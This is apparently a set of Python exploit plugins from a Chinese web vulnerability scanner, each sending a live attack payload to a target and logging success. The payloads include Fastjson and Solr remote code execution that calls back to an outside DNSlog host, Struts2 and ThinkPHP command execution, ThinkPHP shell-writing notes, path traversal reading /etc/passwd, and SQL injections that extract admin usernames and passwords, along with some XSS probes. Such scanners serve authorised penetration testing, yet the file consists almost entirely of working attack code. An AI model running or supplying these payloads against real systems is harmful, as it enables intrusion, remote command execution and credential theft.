def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + '://' + url + ':' + str(port) DL = Dnslog() data = { "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://" + DL.dns_host() + "//Exploit", "autoCommit": True } } data = json.dumps(data) headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', "Connection": "close", "Accept-Encoding": "gzip, deflate" } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=10, verify=False) if DL.result() and resp.status_code == 500: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format( url, payload_url, resp.text, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payloads = [ "/NewPortal/download.aspx?fileid=1%27%20and%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27))=0%20and%20%27%%27=%27%", "/NewPortal/content_show.aspx?contentid=1%27%20and%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27))=0%20and%20%27%%27=%27%" ] for payload in payloads: try: payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'application/json', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 500 and con.find( "c4ca4238a0b923820dcc509a6f75849b") != -1: Medusa = "{}存在EuseTMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/celive/live/header.php" data = { 'xajax': 'LiveMessage', 'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(select md5(233)))a from information_schema.tables group by a)b),'','','','1','127.0.0.1','2') #" } payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text if con.find("e165421110ba03099a1c0393373c5b43") != -1: Medusa = "{}存在CmsEasySQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: #查看phpinfo payload = "/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1" # 查看执行命令替换id值 "/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" #写入shell,把2222换成一句话就可,写入文件在跟目录 "/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 2222>>test.php" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("PHP Version") != -1 and con.find( "System") != -1 and con.find("Build Date") != -1: Medusa = "{}存在ThinkPHP任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回值:{}\r\n".format( url, payload_url, con) print(Medusa) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payloads = [ "/Plan/plancommentlist.aspx?type=3&targetid=1%27and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--", "/repoort/smartuser.aspx?di=1%27and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--", "/euseinfo.aspx?id=1and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--", ] for payload in payloads: try: payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'application/json', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 500 and con.find( "81dc9bdb52d04dc20036dbd8313ed055") != -1: Medusa = "{}存在EuseTMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload1 = "/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd" payload2 = "/a/b/master/..%252F..%252Fetc%252Fpasswd" for i in [payload1, payload2]: try: payload_url = scheme + "://" + url + ":" + str(port) + i headers = { 'User-Agent': RandomAgent, 'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en', 'Connection': 'close', "Upgrade-Insecure-Requests": "1" } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False, allow_redirects=False) con = resp.text code = resp.status_code if code == 200 and con.find("root:x:") != -1 and con.find( "bin:x") != -1 and con.find("lp:x") != -1: Medusa = "{} 存在Spring反射文件下载漏洞\r\n漏洞地址:\r\n{}\r\n返回内容:\r\n{}".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/main.php?m=company&s=admin/business_info_list' payload_url = scheme + "://" + url + ":" + str(port) + payload data = "del[]=1) or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,md5(c)) from hy_admin))),0) %23&updateID=11&cc=6750" headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPost数据:{}\r\n返回内容:{}\r\n".format( url, payload_url, data, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: # 爆密码: # payload = "/comment.php?ctype=2&conid=16873 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(b2bbuilder_admin.password as char))),0x27,0x7e) from `b2bbuilder`.b2bbuilder_admin Order by user limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1" # 爆账号: payload = "/comment.php?ctype=2&conid=16873%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(md5(c),0x3A,password)%20from%20b2bbuilder_admin%20Order%20by%20user%20limit%200,1)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = '/mobile/user.php?act=act_register' payload_url = scheme + "://" + url + ":" + str(port) + payload data = 'username=networks<script>alert({})</script>&[email protected]&password=woaini&confirm_password=woaini&act=act_register&back_act='.format( rm) headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, data=data, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( "<script>alert({})</script>".format(rm)) != -1: Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/admin.php?file=tag&action=preview&tag_code={phpinfo()}' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("PHP Version") != -1 and con.find( "System") != -1 and con.find("Build Date") != -1 and con.find( "Server API") != -1: Medusa = "{}存在Destoon前台Getshell漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() data = """username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx""" % DL.dns_host( ) payload = "/users?page=&size=5" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Referer": payload_url } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) time.sleep(4) if DL.result(): Medusa = "{}存在SpringDataCommons远程命令执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format( url, resp.text, DL.dns_host(), str(DL.dns_text())) print(Medusa) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent" data = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert({})%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''.format( rm) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( "<td><img src=x onerror=alert({})></td>".format(rm)) != -1: Medusa = "{}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "X-Forwarded-For": "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(c),user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在B2Bbuilder头部SQL注入漏洞\r\n 漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/member/chat.php?touser=admin' data = "forward=aaaa%2527),(12345678901234567890123456789012,(select%2574 md5(c)),%2527test2test2%2527,4%25275" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在DestoonSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port, path = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = '''username=medusa&password=%25%7b%23a%3d(new+java.lang.ProcessBuilder(new+java.lang.String%5b%5d%7b%22cat%22%2c%22%2fetc%2fpasswd%22%7d)).redirectErrorStream(true).start()%2c%23b%3d%23a.getInputStream()%2c%23c%3dnew+java.io.InputStreamReader(%23b)%2c%23d%3dnew+java.io.BufferedReader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23f%3d%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2c%23f.getWriter().println(new+java.lang.String(%23e))%2c%23f.getWriter().flush()%2c%23f.getWriter().close()%7d''' payload_url = scheme + "://" + url + ':' + str(port) + path headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'User-Agent': RandomAgent, 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', } try: resp = requests.post(payload_url, data=payload, headers=headers, proxies=proxies, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('root:') != -1 and con.find( '/bin/bash') != -1 and con.find('bin:') != -1: Medusa = "{}存在Struts2远程代码执行漏洞(S2-001)\r\n漏洞详情:\r\n版本号:S2-001\r\nPayload:{}\r\n返回数据包:{}\r\n".format( url, payload, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/member/record.php' data1 = '?action=pay&mid=-1+union//***/select//***/1,2,md5(c),username,5,6,7,8,9 from destoon_member where admin=1-- a' data2 = '?action=pay&mid=-1+union//***/select//***/1,2,GROUP_CONCAT(DISTINCT+table_name),4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()--%20a' data3 = '?action=pay&mid=-1+union//***/select//***/1,2,concat(username,0x3A,password),4,5,6,7,8,9%20from%20destoon_member%20where%20admin=1--%20a' payload_url = scheme + "://" + url + ":" + str(port) + payload + data1 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在DestoonSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/index.php?case=tool&act=cut_image' data = 'pic=1ftp://192.168.1.5/phpinfo.php&w=700&h=1120&x1=0&x2=700&y1=0&y2=1120' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '\/upload\/images\/201612\/148159258747.php') != -1: Medusa = "{}存在CmsEasy跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores' step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = headers).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/"+name+"/dataimport?_=1582117587113&indent=on&wt=json" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'application/json', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } DL = Dnslog() # 初始化DNSlog #POC没问题DNSlog有问题 # DL="p61rpm.dnslog.cn" data2="command=full-import&verbose=false&clean=false&commit=true&debug=true&core="+name+"&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(DL.dns_host()) resp = requests.post(payload_url,data=data2,headers=headers, proxies=proxies,timeout=6, verify=False) if DL.result(): Medusa = "{}存在Solr远程代码执行漏洞(CVE-2019-0193)\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(url,payload_url,data2) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
